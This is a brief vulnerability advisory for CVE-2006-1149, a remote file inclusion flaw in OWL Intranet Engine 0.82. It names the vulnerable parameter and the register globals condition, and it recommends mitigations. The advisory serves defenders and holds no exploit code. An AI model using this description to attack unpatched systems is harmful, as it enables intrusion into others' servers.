CVE-2006-1149

Name of the Vulnerable Software and Affected Versions OWL Intranet Engine version 0.82

Description The issue allows remote attackers to include arbitrary files via a URL in the xrms file root parameter, which is not initialized before use, when register globals is enabled. This can be exploited by providing a malicious URL as the xrms file root parameter.

Recommendations For OWL Intranet Engine version 0.82, consider disabling the register globals setting to prevent exploitation. Additionally, restrict access to the lib/OWL API.php file to minimize the risk of arbitrary file inclusion. Avoid using the xrms file root parameter until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.